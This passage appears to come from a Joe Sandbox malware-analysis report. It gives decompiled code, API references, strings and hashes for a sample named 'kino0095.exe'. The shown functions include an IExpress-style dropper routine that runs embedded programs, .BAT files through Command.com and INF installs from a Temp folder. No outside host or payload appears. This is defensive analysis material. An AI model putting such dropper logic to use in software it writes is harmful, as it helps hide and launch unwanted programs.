Opcode Fuzzy Hash: 8869d0824eb19464cae7da9100bae2d8cc37a5c0b10d5c67c72c21a849d46169
Instruction Fuzzy Hash: C311A7B9604641AFD714AF249D18F773759E7C5300B04893AEB82BB381DA799C068668

Uniqueness

Uniqueness Score: -1.00%

Function 00403680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x0040368c
0x0040368f
0x00403691
0x0040369f
0x004036a7
0x00000000
0x00000000
0x004036ba
0x00000000
0x004036bc
0x004036bc
0x004036c0
0x004036cb
0x004036c2
0x004036c4
0x004036c4
0x004036da
0x004036e0
0x004036e6
0x00000000
0x00000000
0x004036e6
0x00000000
0x004036ba
0x004036ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0040369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004036B2
DispatchMessageA.USER32(?), ref: 004036CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004036DA

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: 001db7e1ce09ae2bdadfcd650bd5b9b259c25642c0b251ba00b0c79510ce8a6d
Instruction ID: f05eb470e6dbefdbdbfe8bdb1bf4a5152229d967e769d6720ff509b3f6c8b066
Opcode Fuzzy Hash: 001db7e1ce09ae2bdadfcd650bd5b9b259c25642c0b251ba00b0c79510ce8a6d
Instruction Fuzzy Hash: E701847290021977DB304AA65C48EEB7A7CEB86B11F04013AB905F62C0D5758654C6A9

Uniqueness

Uniqueness Score: -1.00%

Function 004065E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E004065E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x004065e8
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f4
0x004065f6
0x004065f7
0x00406608
0x00406611
0x00406618
0x0040661c
0x00000000
0x00000000
0x0040660e
0x00406623
0x00406625
0x0040663b
0x0040663b
0x0040663d
0x00406641
0x00406610
0x00406610
0x00000000
0x00406610
0x00406644
0x00406647
0x00406647
0x00406621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00402B33), ref: 00406602
CharPrevA.USER32(?,00000000), ref: 00406612
CharPrevA.USER32(?,00000000), ref: 00406629
CharNextA.USER32(00000000), ref: 00406635

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 828796b4383d088e17d1056b3097c8ba1f0d67e732c974cb9d04120152cf1a4e
Instruction ID: 90baad459b50eabb1a16afa7fd56dffec2b03aec054ee39de7a83aca56c67232
Opcode Fuzzy Hash: 828796b4383d088e17d1056b3097c8ba1f0d67e732c974cb9d04120152cf1a4e
Instruction Fuzzy Hash: BCF02D310045506EE7325B285C888B7BF9CCF87354B1B057FE493B6241DA3E0D168669

Uniqueness

Uniqueness Score: -1.00%

Function 004069B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004069B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x4081f8 = E00406C70();
				__set_app_type(E00406FBE(2));
				 *0x4088a4 =  *0x4088a4 | 0xffffffff;
				 *0x4088a8 =  *0x4088a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x408528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x40851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00407000();
				if( *0x408000 == 0) {
					__setusermatherr(E00407000);
				}
				E004071EF(_t6);
				return 0;
			}

0x004069b7
0x004069c2
0x004069c8
0x004069cf
0x004069d8
0x004069de
0x004069e4
0x004069e6
0x004069ec
0x004069f2
0x004069f4
0x00406a00
0x00406a07
0x00406a0d
0x00406a0e
0x00406a15

APIs

Part of subcall function 00406FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00406FC5

__set_app_type.MSVCRT ref: 004069C2
__p__fmode.MSVCRT ref: 004069D8
__p__commode.MSVCRT ref: 004069E6
__setusermatherr.MSVCRT ref: 00406A07

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: 5c327bfb5f8620ce66be7007ffc2ded83395ae1433e947bc734a25fcd952183d
Instruction ID: 6ac6555f9eb226a1f7bfa0f854930428727c3ad6fe2539b3037ce5b820c07743
Opcode Fuzzy Hash: 5c327bfb5f8620ce66be7007ffc2ded83395ae1433e947bc734a25fcd952183d
Instruction Fuzzy Hash: 8EF0F8705083019FD714BB30AF0A7083B61FB05329B11467EE4A2B63E1CF3E95618A1D

Uniqueness

Uniqueness Score: -1.00%

Function 00406952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406952(CHAR* __ecx) {
				long _v8;
				long _v12;
				long _v16;
				char _v20;
				int _t22;

				_t22 = 0;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if( *__ecx != 0) {
					_t6 =  &_v20; // 0x405760
					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
					}
				}
				return _t22;
			}

0x0040695b
0x00406960
0x00406963
0x00406966
0x00406969
0x0040696c
0x00406972
0x00406987
0x0040699f
0x0040699f
0x00406987
0x004069a7

APIs

GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W@,?,00000000,00405760,?,A:\), ref: 0040697F
MulDiv.KERNEL32(?,?,00000400), ref: 00406999

Strings

`W@, xrefs: 00406972, 00406975

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: DiskFreeSpace
String ID: `W@
API String ID: 1705453755-883988529
Opcode ID: 4554a972362b579aece8da8bb716027f856847a3e88e224d63c11008acf42226
Instruction ID: 1c7512448c6eccd8852a64e065144c261afeb287fd377f30d938299290270787
Opcode Fuzzy Hash: 4554a972362b579aece8da8bb716027f856847a3e88e224d63c11008acf42226
Instruction Fuzzy Hash: FCF0E7B6D00228BBCB11DFE88944ADEBBBCEB48700F1041A6A511F6240D6759A108BD5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: kino0095.exePID: 6372, Parent PID: 6356COMMON

Execution Graph

Execution Coverage:	28.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	960
Total number of Limit Nodes:	25

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00303BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00303BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x308004; // 0xcd371c79
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x309124 =  *0x309124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x308a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x308c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E0030468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E003044B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x309124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00301AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00306CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00303FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x308580;
													if( *0x308580 != 0) {
														E00302267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x308180;
											if( *0x308180 == 0) {
												_t146 = 0x4c7;
												E003044B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x309124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x309a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00306495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E003044B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x309124 = E00306285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E003044B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x308a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x309a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x308a38 & 0x0000ffff;
											_v380 = 0x309154;
											_v376 = _t151;
											_v372 = 0x3091e4;
											_v360 = _t97;
											if( *0x308a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x309a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x308d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x309a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x30a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x309124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x309a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x308a20;
										if( *0x308a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0030202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0030468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x308c42;
									if( *0x308c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x308a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0030468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0030468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00301781( &_v276, 0x104, _t130, 0x308c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E0030468F(_t130, 0x309a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x00303baa
0x00303bb0
0x00303bb7
0x00303bc0
0x00303bc2
0x00303bc9
0x00303bcb
0x00303bcf
0x00303bd3
0x00303bd9
0x00303bfd
0x00303bfd
0x00303bff
0x00303c03
0x00303c03
0x00303c11
0x00303c16
0x00303c19
0x00303c28
0x00000000
0x00000000
0x00303c30
0x00303c39
0x00303c40
0x00303d13
0x00303d15
0x00303d21
0x00303d26
0x00000000
0x00303c4f
0x00303c56
0x00303c60
0x00303c65
0x00303c77
0x00303c78
0x00303c7c
0x00303c7e
0x00303c82
0x00303c82
0x00000000
0x00303c7c
0x00303c67
0x00303c69
0x00303c6d
0x00000000
0x00303c58
0x00303c58
0x00303c6e
0x00303c6e
0x00303c87
0x00303c89
0x00303d4d
0x00303d4f
0x00303d50
0x00303d52
0x00303d9e
0x00303da8
0x00303daf
0x00303db4
0x00303db6
0x00303f4d
0x00303f4d
0x00303f4f
0x00303f56
0x00303f57
0x00303f58
0x00303f63
0x00303f63
0x00303dbc
0x00303dc0
0x00303dc2
0x00303de6
0x00303de6
0x00303de8
0x00303f0b
0x00303f0b
0x00303f0f
0x00303f13
0x00303f15
0x00303f1a
0x00303f1c
0x00303f46
0x00303f47
0x00000000
0x00303f47
0x00303f1e
0x00303f1f
0x00303f25
0x00303f26
0x00303f2a
0x00303f2d
0x00303fd9
0x00303fd9
0x00303fda
0x00303fda
0x00303fe1
0x00303fe3
0x00303fe3
0x00303fe8
0x00000000
0x00303fe8
0x00303f33
0x00303f37
0x00000000
0x00303f37
0x00303dee
0x00303dee
0x00303df5
0x00303fad
0x00303fb9
0x00303fc2
0x00303fc8
0x00000000
0x00303fc8
0x00303dfb
0x00303dfd
0x00000000
0x00000000
0x00303e03
0x00303e0a
0x00000000
0x00000000
0x00303e15
0x00303e17
0x00303e19
0x00303f94
0x00303fa4
0x00303f7c
0x00303f80
0x00303f8b
0x00000000
0x00303f8b
0x00303e2c
0x00303e30
0x00303e34
0x00303e36
0x00303f69
0x00303f6e
0x00303f70
0x00303f76
0x00000000
0x00303f76
0x00303e3c
0x00303e43
0x00303e47
0x00303e52
0x00303e56
0x00303e5c
0x00303e61
0x00303e68
0x00303e70
0x00303e74
0x00303e7c
0x00303e80
0x00303e82
0x00303e82
0x00303e87
0x00303e87
0x00303e8b
0x00303e91
0x00303e94
0x00303e96
0x00303e96
0x00303e9b
0x00303e9b
0x00303e9f
0x00303ea2
0x00303ea4
0x00303ea4
0x00303ea9
0x00303ea9
0x00303ead
0x00303eb3
0x00303eb6
0x00303eb8
0x00303eb8
0x00303ebd
0x00303ebd
0x00303ec1
0x00303ec3
0x00303ec5
0x00303ec5
0x00303eca
0x00303eca
0x00303ece
0x00303ed5
0x00303ed9
0x00303ee0
0x00303ee6
0x00303eea
0x00303eec
0x00303eee
0x00303ef3
0x00303ef3
0x00303ef5
0x00303efa
0x00303efb
0x00303efd
0x00303f40
0x00000000
0x00303eff
0x00303eff
0x00303f05
0x00000000
0x00303f05
0x00303efd
0x00303dc7
0x00303dce
0x00000000
0x00000000
0x00303dd0
0x00303dd7
0x00000000
0x00000000
0x00303dd9
0x00303ddb
0x00000000
0x00000000
0x00303ddd
0x00303de1
0x00000000
0x00303de1
0x00303d59
0x00303d65
0x00303d6a
0x00303d6c
0x00000000
0x00000000
0x00303d6e
0x00303d75
0x00000000
0x00000000
0x00303d8f
0x00303d96
0x00303d98
0x00000000
0x00000000
0x00000000
0x00303d98
0x00303c8f
0x00303c98
0x00303cf1
0x00303cf3
0x00000000
0x00000000
0x00303cfe
0x00303d11
0x00000000
0x00000000
0x00000000
0x00303d11
0x00303c9c
0x00303ca5
0x00303ca7
0x00000000
0x00000000
0x00303cad
0x00303cb2
0x00303cb7
0x00303cc5
0x00000000
0x00000000
0x00303ce8
0x00303cec
0x00303ced
0x00303ced
0x00000000
0x00303ce8
0x00303c9e
0x00000000
0x00303c9e
0x00303c56
0x00303d35
0x00303d35
0x00303d3c
0x00303d48
0x00000000
0x00303d48
0x00303c03
0x00303be2
0x00303be7
0x00303bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 00303C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00303CDC

Part of subcall function 0030468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003046A0
Part of subcall function 0030468F: SizeofResource.KERNEL32(00000000,00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046A9
Part of subcall function 0030468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003046C3
Part of subcall function 0030468F: LoadResource.KERNEL32(00000000,00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046CC
Part of subcall function 0030468F: LockResource.KERNEL32(00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046D3
Part of subcall function 0030468F: memcpy_s.MSVCRT ref: 003046E5
Part of subcall function 0030468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003046EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00308C42), ref: 00303D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00303E26
FreeLibrary.KERNEL32(00000000,?,00308C42), ref: 00303EFF
LocalFree.KERNEL32(?,?,?,?,00308C42), ref: 00303F1F
FreeLibrary.KERNEL32(00000000,?,00308C42), ref: 00303F40
LocalFree.KERNEL32(?,?,?,?,00308C42), ref: 00303F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00308C42), ref: 00303F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00308C42), ref: 00303F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00308C42), ref: 00303FC2

Strings

doza2, xrefs: 00303E68
ADMQCMD, xrefs: 00303C9E
REBOOT, xrefs: 00303BE2
advpack.dll, xrefs: 00303F9D
POSTRUNPROGRAM, xrefs: 00303D60
RUNPROGRAM, xrefs: 00303D05
USRQCMD, xrefs: 00303CAD
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00303E74
DoInfInstall, xrefs: 00303E1F, 00303E24, 00303F68
<None>, xrefs: 00303CC9, 00303D7D
SHOWWINDOW, xrefs: 00303C34
D, xrefs: 00303C19

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$doza2
API String ID: 1032054927-2304959275
Opcode ID: 06f5aea7f8de9b5dd6eb467356dcd7372ac5e14f80065a01175b93a68e374091
Instruction ID: b64a94e7f69ffd440de246c9dca36138a6edf43d5a26ed6a9e04de38b82a4d4f
Opcode Fuzzy Hash: 06f5aea7f8de9b5dd6eb467356dcd7372ac5e14f80065a01175b93a68e374091
Instruction Fuzzy Hash: C6B1D170A0B3019BE727DF249875B6B76ECEB84700F11092EFA85D61E1DB74CA44CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00301AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00301AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x308004; // 0xcd371c79
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00301680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00301A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00301781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
					E0030658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00301680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E003066C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E003066C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00301680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00301781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E003016B3( &_v1552, 0x400, " ");
										E003016B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00302AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0030171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00301A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
